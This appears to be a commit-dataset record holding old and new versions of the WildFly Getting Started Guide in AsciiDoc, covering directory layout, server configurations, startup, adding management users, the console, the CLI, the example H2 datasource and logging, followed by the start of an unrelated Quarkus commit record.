directory:\n\n[cols=\",\",options=\"header\"]\n|=======================================================================\n|DIRECTORY |DESCRIPTION\n\n|configuration |Configuration files for the domain and for the Host\nController and any servers running off of this installation. All\nconfiguration information for the servers managed wtihin the domain is\nlocated here and is the single place for configuration information.\n\n|content |an internal working area for the Host Controller that controls\nthis installation. This is where it internally stores deployment\ncontent. This directory is not meant to be manipulated by end users.Note\nthat \"domain\" mode does not support deploying content based on scanning\na file system.\n\n|lib\/ext |Location for installed library jars referenced by applications\nusing the Extension-List mechanism\n\n|log |Location where the Host Controller process writes its logs. The\nProcess Controller, a small lightweight process that actually spawns the\nother Host Controller process and any Application Server processes also\nwrites a log here.\n\n|servers |Writable area used by each Application Server instance that\nruns from this installation. Each Application Server instance will have\nits own subdirectory, created when the server is first started. In each\nserver's subdirectory there will be the following subdirectories:data --\ninformation written by the server that needs to survive a restart of the\nserverlog -- the server's log filestmp -- location for temporary files\nwritten by the server\n\n|tmp |location for temporary files written by the server\n\n|tmp\/auth |Special location used to exchange authentication tokens with\nlocal clients so they can confirm that they are local to the running AS\nprocess.\n|=======================================================================\n\n[[wildfly-configurations]]\n=== WildFly {wildflyVersion} Configurations\n\n[[standalone-server-configurations]]\n==== Standalone Server Configurations\n\n* standalone.xml (_default_)\n** Jakarta web profile certified configuration with\nthe required technologies plus those noted in the table above.\n\n* standalone-ha.xml\n** Jakarta web profile certified configuration with\nhigh availability\n\n* standalone-full.xml\n** Jakarta Full Platform certified configuration\nincluding all the required technologies\n\n* standalone-full-ha.xml\n** Jakarta Full Platform certified configuration with\nhigh availability\n\n* standalone-microprofile.xml\n** A configuration oriented toward microservices, providing our\nMicroProfile platform implementations combined with Jakarta RESTful Web Services and\ntechnologies Jakarta RESTful Web Services applications commonly use to integrate with\nexternal services.\n\n* standalone-microprofile-ha.xml\n** A configuration oriented toward microservices, similar to\n_standalone-microprofile.xml_ but with support for high availability\nweb sessions and distributed Hibernate second level caching.\n\n[[domain-server-configurations]]\n==== Domain Server Configurations\n\n* domain.xml\n** Jakarta full and web profiles available with or\nwithout high availability\n\nImportant to note is that the *_domain_* and *_standalone_* modes\ndetermine how the servers are managed not what capabilities they\nprovide.\n\n[[starting-wildfly-10]]\n== Starting WildFly {wildflyVersion}\n\nTo start WildFly {wildflyVersion} using the default web profile configuration in \"\n_standalone_\" mode, change directory to $JBOSS_HOME\/bin.\n\n[source,options=\"nowrap\"]\n----\n.\/standalone.sh\n----\n\nTo start the default web profile configuration using domain management\ncapabilities,\n\n[source,options=\"nowrap\"]\n----\n.\/domain.sh\n----\n\n[[starting-wildfly-with-an-alternate-configuration]]\n=== Starting WildFly with an Alternate Configuration\n\nIf you choose to start your server with one of the other provided\nconfigurations, they can be accessed by passing the --server-config\nargument with the server-config file to be used.\n\nTo use the Full Platform with clustering capabilities, use the following\nsyntax from $JBOSS_HOME\/bin:\n\n[source,options=\"nowrap\"]\n----\n.\/standalone.sh --server-config=standalone-full-ha.xml\n----\n\nSimilarly to start an alternate configuration in _domain_ mode:\n\n[source,options=\"nowrap\"]\n----\n.\/domain.sh --domain-config=my-domain-configuration.xml\n----\n\nAlternatively, you can create your own selecting the additional\nsubsystems you want to add, remove, or modify.\n\n[[test-your-installation]]\n=== Test Your Installation\n\nAfter executing one of the above commands, you should see output similar\nto what's shown below.\n\n[source,options=\"nowrap\"]\n----\n=========================================================================\n\u00a0\n JBoss Bootstrap Environment\n\u00a0\n JBOSS_HOME: \/opt\/wildfly-10.0.0.Final\n\u00a0\n JAVA: java\n\u00a0\n JAVA_OPTS: -server -Xms64m -Xmx512m -XX:MetaspaceSize=96M -XX:MaxMetaspaceSize=256m -Djava.net.preferIPv4Stack=true -Djboss.modules.system.pkgs=com.yourkit,org.jboss.byteman -Djava.awt.headless=true\n\u00a0\n=========================================================================\n\u00a0\n11:46:11,161 INFO [org.jboss.modules] (main) JBoss Modules version 1.5.1.Final\n11:46:11,331 INFO [org.jboss.msc] (main) JBoss MSC version 1.2.6.Final\n11:46:11,391 INFO [org.jboss.as] (MSC service thread 1-6) WFLYSRV0049: WildFly Full 10.0.0.Final (WildFly Core 2.0.10.Final) starting\n<snip>\n11:46:14,300 INFO [org.jboss.as] (Controller Boot Thread) WFLYSRV0025: WildFly Full 10.0.0.Final (WildFly Core 2.0.10.Final) started in 1909ms - Started 267 of 553 services (371 services are lazy, passive or on-demand)\n----\n\nAs with previous WildFly releases, you can point your browser to\n*_http:\/\/localhost:8080_* (if using the default configured http port)\nwhich brings you to the Welcome Screen:\n\nimage:wildfly.png[images\/wildfly.png]\n\nFrom here you can access links to the WildFly community documentation\nset, stay up-to-date on the latest project information, have a\ndiscussion in the user forum and access the enhanced web-based\nAdministration Console. Or, if you uncover a defect while using WildFly,\nreport an issue to inform us (attached patches will be reviewed). This\nlanding page is recommended for convenient access to information about\nWildFly {wildflyVersion} but can easily be replaced with your own if desired.\n\n[[managing-your-wildfly-10]]\n== Managing your WildFly {wildflyVersion}\n\nWildFly {wildflyVersion} offers two administrative mechanisms for managing your\nrunning instance:\n\n* a web-based Administration Console\n* a command-line interface\n\nThe link:Admin_Guide{outfilesuffix}[Admin Guide] covers the details on managing your WildFly\ninstallation. Here we'll just touch on some of the basics.\n\n=== Authentication\n\nBy default WildFly {wildflyVersion} is distributed with security enabled for the\nmanagement interfaces. This means that before you connect using the\nadministration console or remotely using the CLI you will need to add a\nnew user. This can be achieved simply by using the _add-user.sh_ script\nin the bin folder.\n\nAfter starting the script you will be guided through the process to add\na new user: -\n\n[source,options=\"nowrap\"]\n----\n.\/add-user.sh\nWhat type of user do you wish to add?\n a) Management User (mgmt-users.properties)\n b) Application User (application-users.properties)\n(a):\n----\n\nIn this case a new user is being added for the purpose of managing the\nservers so select option a.\n\nYou will then be prompted to enter the details of the new user being\nadded: -\n\n[source,options=\"nowrap\"]\n----\nEnter the details of the new user to add.\nRealm (ManagementRealm) :\nUsername :\nPassword :\nRe-enter Password :\n----\n\nIt is important to leave the name of the realm as 'ManagementRealm' as\nthis needs to match the name used in the server's configuration, for the\nremaining fields enter the new username, password and password\nconfirmation.\n\nProvided there are no errors in the values entered you will then be\nasked to confirm that you want to add the user, the user will be written\nto the properties files used for authentication and a confirmation\nmessage will be displayed.\n\nThe modified time of the properties files are inspected at the time of\nauthentication and the files reloaded if they have changed, for this\nreason you do not need to re-start the server after adding a new user.\n\n[[administration-console]]\n=== Administration Console\n\nTo access the web-based Administration Console, simply follow the link\nfrom the Welcome Screen. To directly access the Management Console,\npoint your browser at:\n\n*_http:\/\/localhost:9990\/console_*\n\nNOTE: port 9990 is the default port configured.\n\n[source,xml,options=\"nowrap\"]\n----\n<management-interfaces>\n <native-interface security-realm=\"ManagementRealm\">\n <socket-binding native=\"management-native\"\/>\n <\/native-interface>\n <http-interface security-realm=\"ManagementRealm\">\n <socket-binding http=\"management-http\"\/>\n <\/http-interface>\n<\/management-interfaces>\n----\n\nIf you modify the _management-http_ socket binding in your running\nconfiguration: adjust the above command accordingly. If such\nmodifications are made, then the link from the Welcome Screen will also\nbe inaccessible.\n\nIf you have not yet added at least one management user an error page\nwill be displayed asking you to add a new user, after a user has been\nadded you can click on the 'Try Again' link at the bottom of the error\npage to try connecting to the administration console again.\n\n[[command-line-interface]]\n=== Command-Line Interface\n\nIf you prefer to manage your server from the command line (or batching),\nthe _jboss-cli.sh_ script provides the same capabilities available via\nthe web-based UI. This script is accessed from $JBOSS_HOME\/bin\ndirectory; e.g.,\n\n[source,options=\"nowrap\"]\n----\n$JBOSS_HOME\/bin\/jboss-cli.sh --connect\nConnected to standalone controller at localhost:9990\n----\n\nNotice if no host or port information provided, it will default to\nlocalhost:9990.\n\nWhen running locally to the WildFly process the CLI will silently\nauthenticate against the server by exchanging tokens on the file system,\nthe purpose of this exchange is to verify that the client does have\naccess to the local file system. If the CLI is connecting to a remote\nWildFly installation then you will be prompted to enter the username and\npassword of a user already added to the realm.\n\nOnce connected you can add, modify, remove resources and deploy or\nundeploy applications. For a complete list of commands and command\nsyntax, type *_help_* once connected.\n\n[[modifying-the-example-datasource]]\n=== Modifying the Example DataSource\n\nAs with previous JBoss application server releases, a default data\nsource, *_ExampleDS_* , is configured using the embedded H2 database for\ndeveloper convenience. There are two ways to define datasource\nconfigurations:\n\n1. as a module\n2. as a deployment\n\nIn the provided configurations, H2 is configured as a module. The module\nis located in the $JBOSS_HOME\/modules\/com\/h2database\/h2 directory. The\nH2 datasource configuration is shown below.\n\n[source,xml,options=\"nowrap\"]\n----\n<subsystem xmlns=\"urn:jboss:domain:datasources:1.0\">\n <datasources>\n <datasource jndi-name=\"java:jboss\/datasources\/ExampleDS\" pool-name=\"ExampleDS\">\n <connection-url>jdbc:h2:mem:test;DB_CLOSE_DELAY=-1<\/connection-url>\n <driver>h2<\/driver>\n <pool>\n <min-pool-size>10<\/min-pool-size>\n <max-pool-size>20<\/max-pool-size>\n <prefill>true<\/prefill>\n <\/pool>\n <security>\n <user-name>sa<\/user-name>\n <password>sa<\/password>\n <\/security>\n <\/datasource>\n <xa-datasource\u00a0jndi-name=\"java:jboss\/datasources\/ExampleXADS\"\u00a0pool-name=\"ExampleXADS\">\n \u00a0<driver>h2<\/driver>\n \u00a0\u00a0\u00a0 <xa-datasource-property\u00a0name=\"URL\">jdbc:h2:mem:test<\/xa-datasource-property>\n <xa-pool>\n <min-pool-size>10<\/min-pool-size>\n <max-pool-size>20<\/max-pool-size>\n <prefill>true<\/prefill>\n <\/xa-pool>\n \u00a0\u00a0\u00a0 <security>\n \u00a0\u00a0\u00a0\u00a0\u00a0 <user-name>sa<\/user-name>\n \u00a0\u00a0\u00a0\u00a0\u00a0 <password>sa<\/password>\n \u00a0\u00a0\u00a0 <\/security>\n \u00a0 <\/xa-datasource>\n <drivers>\n \u00a0<driver name=\"h2\" module=\"com.h2database.h2\">\n <xa-datasource-class>org.h2.jdbcx.JdbcDataSource<\/xa-datasource-class>\n <\/driver>\n <\/drivers>\n <\/datasources>\n<\/subsystem>\n----\n\nThe datasource subsystem is provided by the\nhttp:\/\/www.jboss.org\/ironjacamar[IronJacamar] project. For a detailed\ndescription of the available configuration properties, please consult\nthe project documentation.\n\n* IronJacamar homepage: http:\/\/www.jboss.org\/ironjacamar\n* Project Documentation: http:\/\/www.jboss.org\/ironjacamar\/docs\n* Schema description:\nhttp:\/\/docs.jboss.org\/ironjacamar\/userguide\/1.0\/en-US\/html\/deployment.html#deployingds_descriptor\n\n[[configure-logging-in-wildfly]]\n=== Configure Logging in WildFly\n\nWildFly logging can be configured with the web console or the command\nline interface. You can get more detail on the link:Admin_Guide{outfilesuffix}#Logging[Logging\nConfiguration] page.\n\nTurn on debugging for a specific category with the CLI:\n\n[source,options=\"nowrap\"]\n----\n\/subsystem=logging\/logger=org.jboss.as:add(level=DEBUG)\n----\n\nIn the example above the `org.jboss.as` log category was configured. Use a different value\nfor the `logger` key to configure a different log category.\n\nBy default the `server.log` is configured to include all levels in its\nlog output. In the above example we changed the console to also display\ndebug messages.\n","old_contents":"[[Getting_Started_Guide]]\n= Getting Started Guide\nWildFly team;\n:revnumber: {version}\n:revdate: {localdate}\n:toc: macro\n:toclevels: 3\n:toc-title: Getting Started Guide\n:doctype: book\n:icons: font\n:source-highlighter: coderay\nifdef::env-github[:imagesdir: images\/]\n\n\/\/ ifndef::ebook-format[:leveloffset: 1]\n\n(C) 2017 The original authors.\n\nifdef::basebackend-html[toc::[]]\n:numbered:\n\n[[getting-started-with-wildfly]]\n== Getting Started with WildFly {wildflyVersion}\n\nWildFly {wildflyVersion} is the latest release in a series of JBoss open-source\napplication server offerings. WildFly {wildflyVersion} is an exceptionally fast,\nlightweight and powerful implementation of the Jakarta\nPlatform specifications. The state-of-the-art architecture built on the\nModular Service Container enables services on-demand when your\napplication requires them. The table below lists the technologies available in WildFly {wildflyVersion}\nserver configuration profiles.\n\n[cols=\",,,,\",options=\"header\"]\n|=======================================================================\n|Jakarta EE Platform Technology |Jakarta EE Full Platform |Jakarta EE Web\nProfile |WildFly {wildflyVersion} Full Platform |WildFly {wildflyVersion} Web Profile\n\n|Jakarta WebSocket |X |X |X |X\n\n|Jakarta JSON Processing 1.1 |X |X |X |X\n\n|Jakarta JSON Binding Specification 1.0 |X |X |X |X\n\n|Jakarta Servlet 4.0 |X |X |X |X\n\n|Jakarta Server Faces 2.3 |X |X |X |X\n\n|Jakarta Expression Language 3.0 |X |X |X |X\n\n|Jakarta Server Pages 2.3 |X |X |X |X\n\n|Jakarta Standard Tag Library 1.2 |X |X |X\n|X\n\n|Jakarta Batch 1.0 |X |-- |X |--\n\n|Jakarta Concurrency |X |X |X |X\n\n|Jakarta Contexts and Dependency Injection 2.0 |X |X |X |X\n\n|Jakarta Dependency Injection |X |X |X |X\n\n|Jakarta Bean Validation 2.0 |X |X |X |X\n\n|Jakarta Enterprise Beans 3.2 |XCMP 2.0Optional |X(Lite) |XCMP\n2.0Not Available |X(Lite)\n\n|Jakarta Interceptors 1.2 |X |X |X |X\n\n|Jakarta Connectors 1.7 |X |-- |X |X\n\n|Jakarta Persistence 2.2 |X |X |X |X\n\n|Jakarta Annotations 1.3 |X |X |X |X\n\n|Jakarta Messaging 2.0 |X |-- |X |--\n\n|Jakarta Transactions 1.3 |X |X |X |X\n\n|Jakarta Mail 1.6 |X |-- |X |X\n\n|Jakarta RESTful Web Services 2.1 |X |X |X |X\n\n|Jakarta Enterprise Web Services 1.3 |X |-- |X |--\n\n|Jakarta XML Web Services Specification 2.3 |X |X |X |X\n\n|Jakarta Web Services Metadata |X |-- |X |--\n\n|Jakarta XML RPC 1.1 |Optional |-- |-- |--\n\n|Jakarta SOAP with Attachments 1.3 |X |-- |X |--\n\n|Jakarta XML Registries |Optional |-- |-- |--\n\n|Jakarta XML Binding Specification 2.3 |X |X |X |X\n\n|Jakarta Authentication 1.1 |X |-- |X |--\n\n|Jakarta Authorization 1.5 |X |-- |X |--\n\n|Jakarta EE Application Deployment 1.2 |Optional |-- |-- |--\n\n|Jakarta Management 1.1 |X |\u00a0 |X |\u00a0\n\n|Jakarta Debugging Support for Other Languages 1.0 |X |X |X |X\n\n|Jakarta Security 1.0 |X |X |X |X\n|=======================================================================\n\nMissing ActiveMQ Artemis and Jakarta Messaging?\n\n[WARNING]\n\nThe WildFly Web Profile doesn't include Jakarta Messaging (provided by ActiveMQ Artemis) by\ndefault. If you want to use messaging, make sure you start the server\n using the \"Full Platform\" configuration.\n\nThis document provides a quick overview on how to download and get\nstarted using WildFly {wildflyVersion} for your application development. For in-depth\ncontent on administrative features, refer to the WildFly {wildflyVersion} Admin Guide.\n\n[[requirements]]\n=== Requirements\n\n* Java SE 8 or later. We recommend that you use the latest available update\nof the current long-term support Java release.\n\n\n[[installation-options]]\n=== Installation Options\n\nThere are a number of ways you can install WildFly, including unzipping our traditional download zip, provisioning a\ncustom installation using Galleon, or building a bootable jar. The link:Installation_Guide{outfilesuffix}[Installation Guide]\nhelps you identify the kind of WildFly installation that best fits your application's deployment needs. In this guide\nwe'll focus on the common approach of installing the download zip.\n\n[[download]]\n=== Download\n\nWildFly {wildflyVersion} distributions can be obtained from:\n\nhttp:\/\/www.wildfly.org\/downloads\/[wildfly.org\/downloads]\n\nWildFly {wildflyVersion} provides a single distribution available in zip or tar file\nformats.\n\n* *wildfly-{wildflyVersion}.0.0.Final.zip*\n* *wildfly-{wildflyVersion}.0.0.Final.tar.gz*\n\n[[installation]]\n=== Installation\n\nSimply extract your chosen download to the directory of your choice. You\ncan install WildFly {wildflyVersion} on any operating system that supports the zip or\ntar formats. Refer to the Release Notes for additional information\nrelated to the release.\n\n[[wildfly---a-quick-tour]]\n=== WildFly - A Quick Tour\n\nNow that you've downloaded WildFly {wildflyVersion}, the next thing to discuss is the\nlayout of the distribution and explore the server directory structure,\nkey configuration files, log files, user deployments and so on. It's\nworth familiarizing yourself with the layout so that you'll be able to\nfind your way around when it comes to deploying your own applications.\n\n[[wildfly-directory-structure]]\n==== WildFly Directory Structure\n\n[cols=\",\",options=\"header\"]\n|=======================================================================\n|DIRECTORY |DESCRIPTION\n\n|appclient |Configuration files, deployment content, and writable areas\nused by the application client container run from this installation.\n\n|bin |Start up scripts, start up configuration files and various command\nline utilities like Vault, add-user and Java diagnostic reportavailable\nfor Unix and Windows environments\n\n|bin\/client |Contains a client jar for use by non-maven based clients.\n\n|docs\/schema |XML schema definition files\n\n|docs\/examples\/configs |Example configuration files representing\nspecific use cases\n\n|domain |Configuration files, deployment content, and writable areas\nused by the domain mode processes run from this installation.\n\n|modules |WildFly is based on a modular classloading architecture.\nThe various modules used in the server are stored here.\n\n|standalone |Configuration files, deployment content, and writable areas\nused by the single standalone server run from this installation.\n\n|welcome-content |Default Welcome Page content\n|=======================================================================\n\n[[standalone-directory-structure]]\n===== Standalone Directory Structure\n\nIn \" *_standalone_* \" mode each WildFly {wildflyVersion} server instance is an\nindependent process (similar to previous JBoss AS versions; e.g., 3, 4,\n5, or 6). The configuration files, deployment content and writable areas\nused by the single standalone server run from a WildFly installation are\nfound in the following subdirectories under the top level \"standalone\"\ndirectory:\n\n[cols=\",\",options=\"header\"]\n|=======================================================================\n|DIRECTORY |DESCRIPTION\n\n|configuration |Configuration files for the standalone server that runs\noff of this installation. All configuration information for the running\nserver is located here and is the single place for configuration\nmodifications for the standalone server.\n\n|data |Persistent information written by the server to survive a restart\nof the server\n\n|deployments |End user deployment content can be placed in this\ndirectory for automatic detection and deployment of that content into\nthe server's runtime.NOTE: The server's management API is recommended\nfor installing deployment content. File system based deployment scanning\ncapabilities remain for developer convenience.\n\n|lib\/ext |Location for installed library jars referenced by applications\nusing the Extension-List mechanism\n\n|log |standalone server log files\n\n|tmp |location for temporary files written by the server\n\n|tmp\/auth |Special location used to exchange authentication tokens with\nlocal clients so they can confirm that they are local to the running AS\nprocess.\n|=======================================================================\n\n[[domain-directory-structure]]\n===== Domain Directory Structure\n\nA key feature of WildFly {wildflyVersion} is the managing multiple servers from a\nsingle control point. A collection of multiple servers are referred to\nas a \" *_domain_* \". Domains can span multiple physical (or virtual)\nmachines with all WildFly instances on a given host under the control of\na Host Controller process. The Host Controllers interact with the Domain\nController to control the lifecycle of the WildFly instances running on\nthat host and to assist the Domain Controller in managing them. The\nconfiguration files, deployment content and writeable areas used by\ndomain mode processes run from a WildFly installation are found in the\nfollowing subdirectories under the top level \"domain\" directory:\n\n[cols=\",\",options=\"header\"]\n|=======================================================================\n|DIRECTORY |DESCRIPTION\n\n|configuration |Configuration files for the domain and for the Host\nController and any servers running off of this installation. All\nconfiguration information for the servers managed wtihin the domain is\nlocated here and is the single place for configuration information.\n\n|content |an internal working area for the Host Controller that controls\nthis installation. This is where it internally stores deployment\ncontent. This directory is not meant to be manipulated by end users.Note\nthat \"domain\" mode does not support deploying content based on scanning\na file system.\n\n|lib\/ext |Location for installed library jars referenced by applications\nusing the Extension-List mechanism\n\n|log |Location where the Host Controller process writes its logs. The\nProcess Controller, a small lightweight process that actually spawns the\nother Host Controller process and any Application Server processes also\nwrites a log here.\n\n|servers |Writable area used by each Application Server instance that\nruns from this installation. Each Application Server instance will have\nits own subdirectory, created when the server is first started. In each\nserver's subdirectory there will be the following subdirectories:data --\ninformation written by the server that needs to survive a restart of the\nserverlog -- the server's log filestmp -- location for temporary files\nwritten by the server\n\n|tmp |location for temporary files written by the server\n\n|tmp\/auth |Special location used to exchange authentication tokens with\nlocal clients so they can confirm that they are local to the running AS\nprocess.\n|=======================================================================\n\n[[wildfly-10-configurations]]\n==== WildFly {wildflyVersion} Configurations\n\n[[standalone-server-configurations]]\n===== Standalone Server Configurations\n\n* standalone.xml (_default_)\n** Jakarta web profile certified configuration with\nthe required technologies plus those noted in the table above.\n\n* standalone-ha.xml\n** Jakarta web profile certified configuration with\nhigh availability\n\n* standalone-full.xml\n** Jakarta Full Platform certified configuration\nincluding all the required technologies\n\n* standalone-full-ha.xml\n** Jakarta Full Platform certified configuration with\nhigh availability\n\n* standalone-microprofile.xml\n** A configuration oriented toward microservices, providing our\nMicroProfile platform implementations combined with Jakarta RESTful Web Services and\ntechnologies Jakarta RESTful Web Services applications commonly use to integrate with\nexternal services.\n\n* standalone-microprofile-ha.xml\n** A configuration oriented toward microservices, similar to\n_standalone-microprofile.xml_ but with support for high availability\nweb sessions and distributed Hibernate second level caching.\n\n[[domain-server-configurations]]\n===== Domain Server Configurations\n\n* domain.xml\n** Jakarta full and web profiles available with or\nwithout high availability\n\nImportant to note is that the *_domain_* and *_standalone_* modes\ndetermine how the servers are managed not what capabilities they\nprovide.\n\n[[starting-wildfly-10]]\n==== Starting WildFly {wildflyVersion}\n\nTo start WildFly {wildflyVersion} using the default web profile configuration in \"\n_standalone_\" mode, change directory to $JBOSS_HOME\/bin.\n\n[source,options=\"nowrap\"]\n----\n.\/standalone.sh\n----\n\nTo start the default web profile configuration using domain management\ncapabilities,\n\n[source,options=\"nowrap\"]\n----\n.\/domain.sh\n----\n\n[[starting-wildfly-with-an-alternate-configuration]]\n==== Starting WildFly with an Alternate Configuration\n\nIf you choose to start your server with one of the other provided\nconfigurations, they can be accessed by passing the --server-config\nargument with the server-config file to be used.\n\nTo use the Full Platform with clustering capabilities, use the following\nsyntax from $JBOSS_HOME\/bin:\n\n[source,options=\"nowrap\"]\n----\n.\/standalone.sh --server-config=standalone-full-ha.xml\n----\n\nSimilarly to start an alternate configuration in _domain_ mode:\n\n[source,options=\"nowrap\"]\n----\n.\/domain.sh --domain-config=my-domain-configuration.xml\n----\n\nAlternatively, you can create your own selecting the additional\nsubsystems you want to add, remove, or modify.\n\n[[test-your-installation]]\n===== Test Your Installation\n\nAfter executing one of the above commands, you should see output similar\nto what's shown below.\n\n[source,options=\"nowrap\"]\n----\n=========================================================================\n\u00a0\n JBoss Bootstrap Environment\n\u00a0\n JBOSS_HOME: \/opt\/wildfly-10.0.0.Final\n\u00a0\n JAVA: java\n\u00a0\n JAVA_OPTS: -server -Xms64m -Xmx512m -XX:MetaspaceSize=96M -XX:MaxMetaspaceSize=256m -Djava.net.preferIPv4Stack=true -Djboss.modules.system.pkgs=com.yourkit,org.jboss.byteman -Djava.awt.headless=true\n\u00a0\n=========================================================================\n\u00a0\n11:46:11,161 INFO [org.jboss.modules] (main) JBoss Modules version 1.5.1.Final\n11:46:11,331 INFO [org.jboss.msc] (main) JBoss MSC version 1.2.6.Final\n11:46:11,391 INFO [org.jboss.as] (MSC service thread 1-6) WFLYSRV0049: WildFly Full 10.0.0.Final (WildFly Core 2.0.10.Final) starting\n<snip>\n11:46:14,300 INFO [org.jboss.as] (Controller Boot Thread) WFLYSRV0025: WildFly Full 10.0.0.Final (WildFly Core 2.0.10.Final) started in 1909ms - Started 267 of 553 services (371 services are lazy, passive or on-demand)\n----\n\nAs with previous WildFly releases, you can point your browser to\n*_http:\/\/localhost:8080_* (if using the default configured http port)\nwhich brings you to the Welcome Screen:\n\nimage:wildfly.png[images\/wildfly.png]\n\nFrom here you can access links to the WildFly community documentation\nset, stay up-to-date on the latest project information, have a\ndiscussion in the user forum and access the enhanced web-based\nAdministration Console. Or, if you uncover a defect while using WildFly,\nreport an issue to inform us (attached patches will be reviewed). This\nlanding page is recommended for convenient access to information about\nWildFly {wildflyVersion} but can easily be replaced with your own if desired.\n\n[[managing-your-wildfly-10]]\n==== Managing your WildFly {wildflyVersion}\n\nWildFly {wildflyVersion} offers two administrative mechanisms for managing your\nrunning instance:\n\n* web-based Administration Console\n* command-line interface\n\n===== Authentication\n\nBy default WildFly {wildflyVersion} is now distributed with security enabled for the\nmanagement interfaces, this means that before you connect using the\nadministration console or remotely using the CLI you will need to add a\nnew user, this can be achieved simply by using the _add-user.sh_ script\nin the bin folder.\n\nAfter starting the script you will be guided through the process to add\na new user: -\n\n[source,options=\"nowrap\"]\n----\n.\/add-user.sh\nWhat type of user do you wish to add?\n a) Management User (mgmt-users.properties)\n b) Application User (application-users.properties)\n(a):\n----\n\nIn this case a new user is being added for the purpose of managing the\nservers so select option a.\n\nYou will then be prompted to enter the details of the new user being\nadded: -\n\n[source,options=\"nowrap\"]\n----\nEnter the details of the new user to add.\nRealm (ManagementRealm) :\nUsername :\nPassword :\nRe-enter Password :\n----\n\nIt is important to leave the name of the realm as 'ManagementRealm' as\nthis needs to match the name used in the server's configuration, for the\nremaining fields enter the new username, password and password\nconfirmation.\n\nProvided there are no errors in the values entered you will then be\nasked to confirm that you want to add the user, the user will be written\nto the properties files used for authentication and a confirmation\nmessage will be displayed.\n\nThe modified time of the properties files are inspected at the time of\nauthentication and the files reloaded if they have changed, for this\nreason you do not need to re-start the server after adding a new user.\n\n[[administration-console]]\n===== Administration Console\n\nTo access the web-based Administration Console, simply follow the link\nfrom the Welcome Screen. To directly access the Management Console,\npoint your browser at:\n\n*_http:\/\/localhost:9990\/console_*\n\nNOTE: port 9990 is the default port configured.\n\n[source,xml,options=\"nowrap\"]\n----\n<management-interfaces>\n <native-interface security-realm=\"ManagementRealm\">\n <socket-binding native=\"management-native\"\/>\n <\/native-interface>\n <http-interface security-realm=\"ManagementRealm\">\n <socket-binding http=\"management-http\"\/>\n <\/http-interface>\n<\/management-interfaces>\n----\n\nIf you modify the _management-http_ socket binding in your running\nconfiguration: adjust the above command accordingly. If such\nmodifications are made, then the link from the Welcome Screen will also\nbe inaccessible.\n\nIf you have not yet added at least one management user an error page\nwill be displayed asking you to add a new user, after a user has been\nadded you can click on the 'Try Again' link at the bottom of the error\npage to try connecting to the administration console again.\n\n[[command-line-interface]]\n===== Command-Line Interface\n\nIf you prefer to manage your server from the command line (or batching),\nthe _jboss-cli.sh_ script provides the same capabilities available via\nthe web-based UI. This script is accessed from $JBOSS_HOME\/bin\ndirectory; e.g.,\n\n[source,options=\"nowrap\"]\n----\n$JBOSS_HOME\/bin\/jboss-cli.sh --connect\nConnected to standalone controller at localhost:9990\n----\n\nNotice if no host or port information provided, it will default to\nlocalhost:9990.\n\nWhen running locally to the WildFly process the CLI will silently\nauthenticate against the server by exchanging tokens on the file system,\nthe purpose of this exchange is to verify that the client does have\naccess to the local file system. If the CLI is connecting to a remote\nWildFly installation then you will be prompted to enter the username and\npassword of a user already added to the realm.\n\nOnce connected you can add, modify, remove resources and deploy or\nundeploy applications. For a complete list of commands and command\nsyntax, type *_help_* once connected.\n\n[[modifying-the-example-datasource]]\n==== Modifying the Example DataSource\n\nAs with previous JBoss application server releases, a default data\nsource, *_ExampleDS_* , is configured using the embedded H2 database for\ndeveloper convenience. There are two ways to define datasource\nconfigurations:\n\n1. as a module\n2. as a deployment\n\nIn the provided configurations, H2 is configured as a module. The module\nis located in the $JBOSS_HOME\/modules\/com\/h2database\/h2 directory. The\nH2 datasource configuration is shown below.\n\n[source,xml,options=\"nowrap\"]\n----\n<subsystem xmlns=\"urn:jboss:domain:datasources:1.0\">\n <datasources>\n <datasource jndi-name=\"java:jboss\/datasources\/ExampleDS\" pool-name=\"ExampleDS\">\n <connection-url>jdbc:h2:mem:test;DB_CLOSE_DELAY=-1<\/connection-url>\n <driver>h2<\/driver>\n <pool>\n <min-pool-size>10<\/min-pool-size>\n <max-pool-size>20<\/max-pool-size>\n <prefill>true<\/prefill>\n <\/pool>\n <security>\n <user-name>sa<\/user-name>\n <password>sa<\/password>\n <\/security>\n <\/datasource>\n <xa-datasource\u00a0jndi-name=\"java:jboss\/datasources\/ExampleXADS\"\u00a0pool-name=\"ExampleXADS\">\n \u00a0<driver>h2<\/driver>\n \u00a0\u00a0\u00a0 <xa-datasource-property\u00a0name=\"URL\">jdbc:h2:mem:test<\/xa-datasource-property>\n <xa-pool>\n <min-pool-size>10<\/min-pool-size>\n <max-pool-size>20<\/max-pool-size>\n <prefill>true<\/prefill>\n <\/xa-pool>\n \u00a0\u00a0\u00a0 <security>\n \u00a0\u00a0\u00a0\u00a0\u00a0 <user-name>sa<\/user-name>\n \u00a0\u00a0\u00a0\u00a0\u00a0 <password>sa<\/password>\n \u00a0\u00a0\u00a0 <\/security>\n \u00a0 <\/xa-datasource>\n <drivers>\n \u00a0<driver name=\"h2\" module=\"com.h2database.h2\">\n <xa-datasource-class>org.h2.jdbcx.JdbcDataSource<\/xa-datasource-class>\n <\/driver>\n <\/drivers>\n <\/datasources>\n<\/subsystem>\n----\n\nThe datasource subsystem is provided by the\nhttp:\/\/www.jboss.org\/ironjacamar[IronJacamar] project. For a detailed\ndescription of the available configuration properties, please consult\nthe project documentation.\n\n* IronJacamar homepage: http:\/\/www.jboss.org\/ironjacamar\n* Project Documentation: http:\/\/www.jboss.org\/ironjacamar\/docs\n* Schema description:\nhttp:\/\/docs.jboss.org\/ironjacamar\/userguide\/1.0\/en-US\/html\/deployment.html#deployingds_descriptor\n\n[[configure-logging-in-wildfly]]\n===== Configure Logging in WildFly\n\nWildFly logging can be configured with the web console or the command\nline interface. You can get more detail on the link:Admin_Guide{outfilesuffix}#Logging[Logging\nConfiguration] page.\n\nTurn on debugging for a specific category with CLI:\n\n[source,options=\"nowrap\"]\n----\n\/subsystem=logging\/logger=org.jboss.as:add(level=DEBUG)\n----\n\nBy default the `server.log` is configured to include all levels in it's\nlog output. In the above example we changed the console to also display\ndebug messages.\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"ecd64a548c2f8484fda6d077f8b7755edc6c2b8f","subject":"sync maven versions in pom.xml, getting-started-guide.adoc","message":"sync maven versions in pom.xml, getting-started-guide.adoc\n\nFixes #502","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/getting-started-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/getting-started-guide.adoc","new_contents":"= {project-name} - Creating Your First 